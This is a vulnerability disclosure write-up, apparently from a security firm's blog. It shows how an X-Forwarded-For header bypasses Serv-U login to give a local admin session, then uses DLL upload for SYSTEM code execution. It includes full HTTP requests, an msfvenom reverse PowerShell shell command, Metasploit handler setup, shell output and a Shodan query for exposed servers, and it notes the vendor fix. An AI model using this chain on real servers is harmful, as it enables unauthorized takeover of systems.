I was recently working on an external network penetration test where I identified a new vulnerability in a file sharing web application called Serv-U by SolarWinds. This vulnerability granted me administrative privileges to the Serv-U application, and, allowed for remote code execution within the context of the SYSTEM user account. In order to demonstrate identification and exploitation of the privilege escalation vulnerability and achieve remote code execution, I will install a trial version of the Serv-U application on a Windows 7 virtual machine.
![10857_9d11685a-7e25-4243-bcf8-656d67190759](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/10857_9d11685a-7e25-4243-bcf8-656d67190759.webp?width=499&height=382&name=10857_9d11685a-7e25-4243-bcf8-656d67190759.webp)
Once Serv-U has been installed, no configuration changes are necessary to exploit the vulnerability. Note that by default the Serv-U web server is listening on the loopback interface, however during the engagement this service was public facing.
![12579_ef831b3b-793f-4ab2-9b1c-139d9e0f32ab](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/12579_ef831b3b-793f-4ab2-9b1c-139d9e0f32ab.webp?width=500&height=456&name=12579_ef831b3b-793f-4ab2-9b1c-139d9e0f32ab.webp)
In order to identify the vulnerability I crawled the web application using Burp Suite's Spider, which helped identify the /?Command=Login page. I then used Burp Suite's Scanner in order to fuzz various pages, which identified a different response when supplying the X-Forwarded-For HTTP header. After a quick manual verification of the findings, it appeared that when submitting a "login request" (no POST parameters are necessary), with the X-Forwarded-For header set to 127.0.0.1, the Serv-U application returns a valid Session cookie for the local administrator account.
POST /?Command=Login HTTP/1.1
Host: 127.0.0.1:43958
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Forwarded-For: 127.0.0.1
HTTP/1.0 200 OK
Server: Serv-U/15.1.4.6
Date: Mon, 30 Jan 2017 16:47:40 GMT
Accept-Encoding: deflate
Connection: close
X-Frame-Options: sameorigin
X-Same-Domain: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Expires: -1
Set-Cookie: Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; path=/; httponly;
Set-Cookie: CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C; path=/; httponly;
Set-Cookie: SULang=en
Content-Length: 66844
...TRUNCATED...
Upon submitting this request from the Firefox web browser, it appears that an error occurred.
![10032_77e2dbea-a88e-46cc-8024-f9b0a7fa0641](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/10032_77e2dbea-a88e-46cc-8024-f9b0a7fa0641.webp?width=684&height=505&name=10032_77e2dbea-a88e-46cc-8024-f9b0a7fa0641.webp)
However, the local administrator session cookie that was provided by the application is valid.
GET / HTTP/1.1
Host: 127.0.0.1:43958
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: SULang=en%2CUS; killmenothing; Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.0 200 OK
Server: Serv-U/15.1.4.6
Date: Mon, 30 Jan 2017 16:48:52 GMT
Accept-Encoding: deflate
Connection: close
X-Frame-Options: sameorigin
X-Same-Domain: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Expires: -1
Set-Cookie: Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; path=/; httponly;
Set-Cookie: CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C; path=/; httponly;
Set-Cookie: SULang=en,US
Content-Length: 66844
...TRUNCATED...
sLoggedInUser="(Local Admin)";sLoggedInUserAlt="Local Admin";
...TRUNCATED...
![7618_00befdf5-db34-46bf-a1c3-f6c6eabbb568](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/7618_00befdf5-db34-46bf-a1c3-f6c6eabbb568.webp?width=684&height=254&name=7618_00befdf5-db34-46bf-a1c3-f6c6eabbb568.webp)
Now that the attacker has administrative privileges to the Serv-U application, the attacker can upload and execute arbitrary DLLs.
![11166_abd362b3-5f4d-45dc-8173-64eb37586cdf](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/11166_abd362b3-5f4d-45dc-8173-64eb37586cdf.webp?width=684&height=424&name=11166_abd362b3-5f4d-45dc-8173-64eb37586cdf.webp)
Next I created a DLL that will spawn a reverse PowerShell shell with 192.168.1.101:8443 and verifying it will not get flagged by the target's anti-virus software.
root@6c656f:~# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.101 LPORT=8443 -f dll > MFC100PWN.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1810 bytes
Final size of dll file: 5120 bytes
root@6c656f:~# file MFC100PWN.dll
MFC100PWN.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
![11048_a5ef9ca1-e7d4-42dc-a1d9-207cd35bf505](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/11048_a5ef9ca1-e7d4-42dc-a1d9-207cd35bf505.webp?width=684&height=289&name=11048_a5ef9ca1-e7d4-42dc-a1d9-207cd35bf505.webp)
Configuring a listener to catch the reverse shell on 192.168.1.101:8443.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/powershell_reverse_tcp
PAYLOAD => windows/x64/powershell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 144.217.164.221
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse SSL handler on 192.168.1.101:8443
[*] Starting the payload handler...
msf exploit(handler) >
Leveraging Serv-U Web Client to upload the malicious DLL to "C:\Program Files\RhinoSoft\Serv-U".
![10629_925eff1b-757d-4d11-a374-2aa28d0f832b](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/10629_925eff1b-757d-4d11-a374-2aa28d0f832b.webp?width=684&height=383&name=10629_925eff1b-757d-4d11-a374-2aa28d0f832b.webp)
![8767_38ebb544-616a-4f83-8e05-e34399ef3b8a](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/8767_38ebb544-616a-4f83-8e05-e34399ef3b8a.webp?width=684&height=530&name=8767_38ebb544-616a-4f83-8e05-e34399ef3b8a.webp)
Executing the uploaded DLL.
![10363_8575847c-a851-4663-af29-2a0b4abc7e62](https://www.trustwave.com/hs-fs/hubfs/Web/Blogs/SpiderLab/10363_8575847c-a851-4663-af29-2a0b4abc7e62.webp?width=684&height=518&name=10363_8575847c-a851-4663-af29-2a0b4abc7e62.webp)
The DLL is executed and the attacker receives a SYSTEM shell.
msf exploit(handler) > [*] Powershell session session 1 opened (192.168.1.101:8443 -> xxx.xxx.xxx.xxx:52069) at 2017-01-30 12:07:05 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Windows PowerShell running as user xxxx-xx-xxxx$ on xxxx-xx-xxxx
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files\RhinoSoft\Serv-U>whoami
nt authority\system
As of January 30, 2017, the following Shodan filter identified over 15,000 public facing servers running the vulnerable service.
Server: Serv-U/ product:"Rhinosoft Serv-U httpd"
Fixes for this issue were released in Serv-U FTP/MFT Server 15.1.5. For more information see our advisory: TWSL2017-008